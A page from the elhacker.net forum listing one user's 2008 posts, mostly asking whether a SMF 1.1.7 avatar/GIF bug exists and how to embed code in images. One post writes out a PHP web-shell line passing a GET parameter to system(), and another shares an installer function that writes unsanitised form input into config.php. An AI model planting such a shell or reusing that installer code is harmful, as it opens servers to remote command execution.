elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Mensajes
Páginas: 1 ... 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 [19] 20 21 22 23 24 25
181  Seguridad Informática / Nivel Web / Re: Reset Admin Password 1.1.7 SMF (TEORIA) en: 9 Enero 2009, 16:50 pm
Me lo leí completo , eres inteligente pero al final no te entendí lograste o no obtener el código.

Saludos, Dacan  :D
182  Seguridad Informática / Nivel Web / Re: [Duda] Existe o no el Bug SMF 1.1.7 en: 26 Diciembre 2008, 01:06 am
Recuerda no es seguro de que exista dicho bug pero lo mas probable ya que segun el encontraron  esos códigos.

Creo que debe ser así:  imagen.gif?cmd=Is (Ejemplo)

Me podrías pasar la imagen gif con el código ya inyectado, te lo agradecería mucho. 

Saludos, Dacan  :D
183  Seguridad Informática / Nivel Web / Re: [Duda] Existe o no el Bug SMF 1.1.7 en: 24 Diciembre 2008, 19:25 pm
Me podrías dar un ejemplo lo leí y luego lo traduje lo que que intendi fue que se puede poner código javascript en una imagen  agregando = 1 y “/*” and “*/”.

Osea abro una imagen .gif con bloc de notas y donde pongo el =1 y los comentarios y en que parte el código javascript ejemplo de redireccion.

Saludos, Dacan  :D
184  Seguridad Informática / Nivel Web / Re: [Duda] Existe o no el Bug SMF 1.1.7 en: 24 Diciembre 2008, 17:42 pm
Cita de: Anon en 24 Diciembre 2008, 17:22 pm
Bueno, segun lei los Post ahi en simplemachines, Ocupas 2 cosas tener system activado en el PHP y ademas poder subir Avatars al foro.

Saludos.

Si pero como puedes poner código PHP en un gif, antes había visto un tutorial que explicaba como inyectar código PHP en los comentarios de un imagen pero eran del formato .jpg

Saludos, Dacan  :D
185  Seguridad Informática / Nivel Web / Re: [Duda] Existe o no el Bug SMF 1.1.7 en: 24 Diciembre 2008, 15:22 pm
Español:
http://www.simplemachines.org/community/index.php?topic=280086.0
http://www.simplemachines.org/community/index.php?topic=278740.0

Ingles:
http://www.simplemachines.org/community/index.php?topic=279068.0

Según los temas pueden ser 2 caminos hacia el bug ademas como pusieron este código en un archivo gif ya que si lo intentas SMF dice que tu archivo excede el tamaño permitido.

<? if(isset($_GET[cmd])) system($_GET[cmd]) ?>

Saludos, Dacan  :D
186  Seguridad Informática / Nivel Web / [Duda] Existe o no el Bug SMF 1.1.7 en: 24 Diciembre 2008, 01:11 am
Googleando he encontrado 2 temas en el foro oficial de SMF de que presuntamente hay un bug en la version 1.1.7 aunque no se cual de los 2 caminos es uno apunta a los perfiles y avatares y otro a un ataque sql injeccion.

Que Saben del tema, que pueden aportar??

Saludos, Dacan  :D
187  Foros Generales / Sugerencias y dudas sobre el Foro / Re: [Duda] por que me borran los mensajes en: 22 Diciembre 2008, 22:48 pm
Ya se lo que hacer cuando eso ocurra ir a mi perfil y buscar mis últimos mensajes.

:S mi Sql Injeccion

Saludos, Dacan  :D
188  Foros Generales / Sugerencias y dudas sobre el Foro / [Duda] por que me borran los mensajes en: 22 Diciembre 2008, 14:06 pm
Ya me han borrado 2 temas uno de sql injeccion y otro de php de una funcion que yo cree, pueden revisar el log o enviarme un MP de porque han sido borrados.  >:D

Saludos, Dacan  :D
189  Programación / PHP / Re: [Funcion] Para Instaladores en: 21 Diciembre 2008, 00:54 am
Cuando pueda la mejoro con mas opciones así cuando necesiten hacer un instalador se ahorren mucho código.

Saludos, Dacan  :D
190  Programación / PHP / [Funcion] Para Instaladores en: 19 Diciembre 2008, 14:50 pm
Función:
Código
  1. <?
  2. // Creada por Dacan
  3. function instalador ($archivo , $variable1, $variable2, $variable3, $variable4){
  4. $manejador = @fopen($archivo, "w+");
  5.  
  6. $contenido = "<?\n";
  7. $contenido .= "\$servidor = \"$variable1\";\n";
  8. $contenido .= "\$usuario = \"$variable2\";\n";
  9. $contenido .= "\$password = \"$variable3\";\n";
  10. $contenido .= "\$base = \"$variable4\";\n";
  11. $contenido .= "\$conexion = @mysql_connect(\$servidor, \$usuario, \$password) or die(mysql_error());\n";
  12. $contenido .= "@mysql_select_db(\$base, \$conexion) or die (mysql_error());\n";
  13. $contenido .= "?>";
  14. if(fwrite($manejador, $contenido)){
  15. return true;	
  16. }
  17. else{
  18. return false;	
  19. }
  20. }
  21. ?>

Ejemplo de Uso:

Código
  1. <?
  2. if(instalador("config.php", $_POST['servidor'], $_POST['usuario'], $_POST['password'], $_POST['base'])){
  3. echo "Datos guardados correctamente";	
  4. }
  5. else {
  6. echo "Ocurrio un error!";	
  7. }
  8. ?>

Como Funciona:

Código
  1. function instalador ($archivo , $variable1, $variable2, $variable3, $variable4){

La variable $archivo corresponde al archivo que se va modificar, $variable 1 corresponde al host donde esta alojada la base de datos, $variable2 corresponde al usuario de la base de datos, $variable3 corresponde la password de la base de datos y $variable4 corresponde el nombre de la base de datos.

Si encuentran algún error, modifican algo, tienen dudas no duden en avisarme, si lo usan en sus scripts aunque sea dejen la parte de Creada por Dacan se les agradece.

Este tema proviene de otro foro al cual pertenezco para que no hayan confusiones: http://mixforo.com/foro/index.php/topic,61657.0.html


Saludos, Dacan  :D
Páginas: 1 ... 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 [19] 20 21 22 23 24 25
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines